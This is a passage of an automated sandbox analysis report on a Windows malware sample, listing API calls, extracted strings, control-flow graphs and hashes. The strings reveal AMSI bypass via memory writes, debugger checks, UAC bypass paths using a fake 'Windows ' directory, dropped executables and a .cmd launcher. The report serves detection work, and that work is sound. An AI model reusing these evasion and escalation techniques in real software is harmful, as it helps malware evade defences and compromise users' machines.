                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02C6ABA2
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C6ABB4
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02C6ABC6
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02C6ABD8
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02C6ABEA
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02C6ABFC
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02C6AC0E
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02C6AC20
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02C6AC32
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02C6AC44
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02C6AC56
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,02C6AE35,00000000,02C6AF11), ref: 02C6ADA9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 2242398760-0
                                                                        • Opcode ID: f7c00887b9086770e2b4359abab48720f3795cc8d192342debe042b3d1564509
                                                                        • Instruction ID: 120512480ff265c31383571b3085aae56d335d82e2507b081760cf18e3d77e80
                                                                        • Opcode Fuzzy Hash: f7c00887b9086770e2b4359abab48720f3795cc8d192342debe042b3d1564509
                                                                        • Instruction Fuzzy Hash: D7C080B3702130178A2067F42CCC5D3574DCD851B730408F3F904F3101D7254C1091D0
                                                                        Function 02C6F7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InetIsOffline.URL(00000000,00000000,02C7B784,?,?,?,00000000,00000000), ref: 02C6F801
                                                                          • Part of subcall function 02C689D0: FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                          • Part of subcall function 02C6F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02C6FAEB,UacInitialize,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,Initialize), ref: 02C6F6EE
                                                                          • Part of subcall function 02C6F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02C6F700
                                                                          • Part of subcall function 02C6F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02C6F754
                                                                          • Part of subcall function 02C6F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02C6F766
                                                                          • Part of subcall function 02C6F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02C6F77D
                                                                          • Part of subcall function 02C57E5C: GetFileAttributesA.KERNEL32(00000000,?,02C7041F,ScanString,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,UacInitialize), ref: 02C57E67
                                                                          • Part of subcall function 02C5C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DCB8B8,?,02C70751,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,OpenSession), ref: 02C5C37B
                                                                          • Part of subcall function 02C6DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C6DE40), ref: 02C6DDAB
                                                                          • Part of subcall function 02C6DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02C6DE40), ref: 02C6DDDB
                                                                          • Part of subcall function 02C6DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02C6DDF0
                                                                          • Part of subcall function 02C6DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02C6DE1C
                                                                          • Part of subcall function 02C6DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02C6DE25
                                                                          • Part of subcall function 02C57E80: GetFileAttributesA.KERNEL32(00000000,?,02C7356F,ScanString,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,Initialize), ref: 02C57E8B
                                                                          • Part of subcall function 02C58048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02C7370D,OpenSession,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,Initialize,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8), ref: 02C58055
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                        • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                        • API String ID: 297057983-2644593349
                                                                        • Opcode ID: a06c1bdc9565208b40314a18d87203dc1182fb8ccd81a994a8c35a857f2b01b3
                                                                        • Instruction ID: 90e7e3932ac7e1336817d76a9199ac9c41d660e94547dbe6a879250400d4bfca
                                                                        • Opcode Fuzzy Hash: a06c1bdc9565208b40314a18d87203dc1182fb8ccd81a994a8c35a857f2b01b3
                                                                        • Instruction Fuzzy Hash: A2140934A0416D8BDB24EF64DC81ADE73FAEF85304F5041E6A409AB214DA30EED5EF59
                                                                        Function 02C73E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C689D0: FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                          • Part of subcall function 02C6DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C6DD5E), ref: 02C6DCCB
                                                                          • Part of subcall function 02C6DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C6DD05
                                                                          • Part of subcall function 02C6DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C6DD32
                                                                          • Part of subcall function 02C6DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C6DD3B
                                                                        • Sleep.KERNEL32(000003E8,ScanBuffer,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,02C7BB30,00000000,00000000,02C7BB24,00000000,00000000), ref: 02C740CB
                                                                          • Part of subcall function 02C688B8: LoadLibraryW.KERNEL32(amsi), ref: 02C688C1
                                                                          • Part of subcall function 02C688B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02C68920
                                                                        • Sleep.KERNEL32(000003E8,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,000003E8,ScanBuffer,02CD7380,02C7B7B8,UacScan,02CD7380), ref: 02C74277
                                                                          • Part of subcall function 02C6894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,UacScan), ref: 02C68960
                                                                          • Part of subcall function 02C6894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C6897A
                                                                          • Part of subcall function 02C6894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize), ref: 02C689B6
                                                                        • Sleep.KERNEL32(00004E20,UacScan,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,UacInitialize,02CD7380,02C7B7B8), ref: 02C750EE
                                                                          • Part of subcall function 02C6DC04: RtlI.N(?,?,00000000,02C6DC7E), ref: 02C6DC2C
                                                                          • Part of subcall function 02C6DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02C6DC7E), ref: 02C6DC42
                                                                          • Part of subcall function 02C6DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02C6DC7E), ref: 02C6DC61
                                                                          • Part of subcall function 02C57E5C: GetFileAttributesA.KERNEL32(00000000,?,02C7041F,ScanString,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,UacInitialize), ref: 02C57E67
                                                                          • Part of subcall function 02C685BC: WinExec.KERNEL32(?,?), ref: 02C68624
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                        • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                        • API String ID: 2171786310-3926298568
                                                                        • Opcode ID: 234a0b1b4706391987c8a9a9c9ddccf9e09db041483e34902e4f92b4567b25a2
                                                                        • Instruction ID: 698e558c3ff4d7f36dd078349d41a1acc4a719b7b18389645be0e6707da74c36
                                                                        • Opcode Fuzzy Hash: 234a0b1b4706391987c8a9a9c9ddccf9e09db041483e34902e4f92b4567b25a2
                                                                        • Instruction Fuzzy Hash: 4E43E734B0416E8BDB24EF64DC81B9A73BAEF85304F1041E69409AB614DE30EED5EF59
                                                                        Function 02C6E678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562synchronizationCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 10197 2c6e678-2c6e67c 10198 2c6e681-2c6e686 10197->10198 10198->10198 10199 2c6e688-2c6ec81 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54740 * 2 call 2c54860 call 2c54778 call 2c530d4 call 2c546d4 * 2 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54740 call 2c57f2c call 2c549a0 call 2c54d74 call 2c54df0 call 2c54740 call 2c549a0 call 2c54d74 call 2c54df0 call 2c68788 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c547ec call 2c549a0 call 2c6894c call 2c54860 call 2c549a0 call 2c547ec call 2c549a0 call 2c6894c call 2c54860 call 2c549a0 call 2c547ec call 2c549a0 call 2c6894c call 2c54860 call 2c549a0 call 2c547ec call 2c549a0 call 2c6894c 10198->10199 10402 2c6ec87-2c6eedd call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 WaitForSingleObject CloseHandle * 2 call 2c54860 call 2c549a0 call 2c547ec call 2c549a0 call 2c6894c call 2c54860 call 2c549a0 call 2c547ec call 2c549a0 call 2c6894c call 2c54860 call 2c549a0 call 2c547ec call 2c549a0 call 2c6894c call 2c54860 call 2c549a0 call 2c547ec call 2c549a0 call 2c6894c * 3 10199->10402 10403 2c6eee2-2c6ef2f call 2c54500 call 2c54c60 call 2c54500 call 2c54c60 call 2c54500 10199->10403 10402->10403
                                                                        APIs
                                                                          • Part of subcall function 02C689D0: FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                          • Part of subcall function 02C68788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02C68814
                                                                          • Part of subcall function 02C6894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,UacScan), ref: 02C68960
                                                                          • Part of subcall function 02C6894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C6897A
                                                                          • Part of subcall function 02C6894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize), ref: 02C689B6
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02CD7380,02C6EF4C,OpenSession,02CD7380,02C6EF4C,UacScan,02CD7380,02C6EF4C,ScanBuffer,02CD7380,02C6EF4C,OpenSession,02CD7380), ref: 02C6ED6E
                                                                        • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02CD7380,02C6EF4C,OpenSession,02CD7380,02C6EF4C,UacScan,02CD7380,02C6EF4C,ScanBuffer,02CD7380,02C6EF4C,OpenSession), ref: 02C6ED76
                                                                        • CloseHandle.KERNEL32(000005EC,00000000,00000000,000000FF,ScanString,02CD7380,02C6EF4C,OpenSession,02CD7380,02C6EF4C,UacScan,02CD7380,02C6EF4C,ScanBuffer,02CD7380,02C6EF4C), ref: 02C6ED7F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                        • String ID: )"C:\Users\Public\Libraries\hizbeleS.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                        • API String ID: 3475578485-3434883246
                                                                        • Opcode ID: 229f982e61229e359d215edc10182479f6641dc2fec13c4f5fd9517270522324
                                                                        • Instruction ID: 5341e4ad60fc1f4ac3e8cc5beaf48a7425ab19a425d8de3bbedace3e435ab41d
                                                                        • Opcode Fuzzy Hash: 229f982e61229e359d215edc10182479f6641dc2fec13c4f5fd9517270522324
                                                                        • Instruction Fuzzy Hash: CC22CF34A001699FEB24FF64D885F9E73BAEF85300F5041A2A405AB254DB31DEC5EF5A
                                                                        Function 02C51724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 12366 2c51724-2c51736 12367 2c5173c-2c5174c 12366->12367 12368 2c51968-2c5196d 12366->12368 12371 2c517a4-2c517ad 12367->12371 12372 2c5174e-2c5175b 12367->12372 12369 2c51a80-2c51a83 12368->12369 12370 2c51973-2c51984 12368->12370 12378 2c51684-2c516ad VirtualAlloc 12369->12378 12379 2c51a89-2c51a8b 12369->12379 12375 2c51986-2c519a2 12370->12375 12376 2c51938-2c51945 12370->12376 12371->12372 12377 2c517af-2c517bb 12371->12377 12373 2c51774-2c51780 12372->12373 12374 2c5175d-2c5176a 12372->12374 12383 2c517f0-2c517f9 12373->12383 12384 2c51782-2c51790 12373->12384 12380 2c51794-2c517a1 12374->12380 12381 2c5176c-2c51770 12374->12381 12385 2c519a4-2c519ac 12375->12385 12386 2c519b0-2c519bf 12375->12386 12376->12375 12382 2c51947-2c5195b Sleep 12376->12382 12377->12372 12389 2c517bd-2c517c9 12377->12389 12387 2c516df-2c516e5 12378->12387 12388 2c516af-2c516dc call 2c51644 12378->12388 12382->12375 12390 2c5195d-2c51964 Sleep 12382->12390 12396 2c5182c-2c51836 12383->12396 12397 2c517fb-2c51808 12383->12397 12391 2c51a0c-2c51a22 12385->12391 12393 2c519c1-2c519d5 12386->12393 12394 2c519d8-2c519e0 12386->12394 12388->12387 12389->12372 12395 2c517cb-2c517de Sleep 12389->12395 12390->12376 12403 2c51a24-2c51a32 12391->12403 12404 2c51a3b-2c51a47 12391->12404 12393->12391 12400 2c519e2-2c519fa 12394->12400 12401 2c519fc-2c519fe call 2c515cc 12394->12401 12395->12372 12399 2c517e4-2c517eb Sleep 12395->12399 12405 2c518a8-2c518b4 12396->12405 12406 2c51838-2c51863 12396->12406 12397->12396 12402 2c5180a-2c5181e Sleep 12397->12402 12399->12371 12414 2c51a03-2c51a0b 12400->12414 12401->12414 12402->12396 12416 2c51820-2c51827 Sleep 12402->12416 12403->12404 12407 2c51a34 12403->12407 12410 2c51a49-2c51a5c 12404->12410 12411 2c51a68 12404->12411 12412 2c518b6-2c518c8 12405->12412 12413 2c518dc-2c518eb call 2c515cc 12405->12413 12408 2c51865-2c51873 12406->12408 12409 2c5187c-2c5188a 12406->12409 12407->12404 12408->12409 12417 2c51875 12408->12417 12418 2c5188c-2c518a6 call 2c51500 12409->12418 12419 2c518f8 12409->12419 12420 2c51a6d-2c51a7f 12410->12420 12421 2c51a5e-2c51a63 call 2c51500 12410->12421 12411->12420 12422 2c518cc-2c518da 12412->12422 12423 2c518ca 12412->12423 12427 2c518fd-2c51936 12413->12427 12431 2c518ed-2c518f7 12413->12431 12416->12397 12417->12409 12418->12427 12419->12427 12421->12420 12422->12427 12423->12422
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 02C517D0
                                                                        • Sleep.KERNEL32(0000000A,00000000), ref: 02C517E6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 7f31004f8a671ebf3f35389ce4a804b6b24c79054419bd1ef1f2e1bb4eb6d553
                                                                        • Instruction ID: f377a0c4be0126c49c9fd38943dbfc89c67a22f6ea2a2b81664e15aef480cda9
                                                                        • Opcode Fuzzy Hash: 7f31004f8a671ebf3f35389ce4a804b6b24c79054419bd1ef1f2e1bb4eb6d553
                                                                        • Instruction Fuzzy Hash: 1EB12672A012618FC729CF28D8C8356BBE1EB85315F1E876AD94DCB385C7B0D591CB98
                                                                        Function 02C688B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(amsi), ref: 02C688C1
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                          • Part of subcall function 02C67D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C67DEC
                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02C68920
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                        • String ID: DllGetClassObject$W$amsi
                                                                        • API String ID: 941070894-2671292670
                                                                        • Opcode ID: 0d8cd97056d448df93180465374a3d3fe389bd273c380d3eca965daf917d55b7
                                                                        • Instruction ID: 925f7bca769ec3d601750f869da8e0c97bc2ae2eda3ff6d15e831e76d19e8ce0
                                                                        • Opcode Fuzzy Hash: 0d8cd97056d448df93180465374a3d3fe389bd273c380d3eca965daf917d55b7
                                                                        • Instruction Fuzzy Hash: 4EF0AF5044C381BAE300E2748C89F5BBECE4B62264F448F18F2E89A2D2D679D1089B77
                                                                        Function 02C51A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
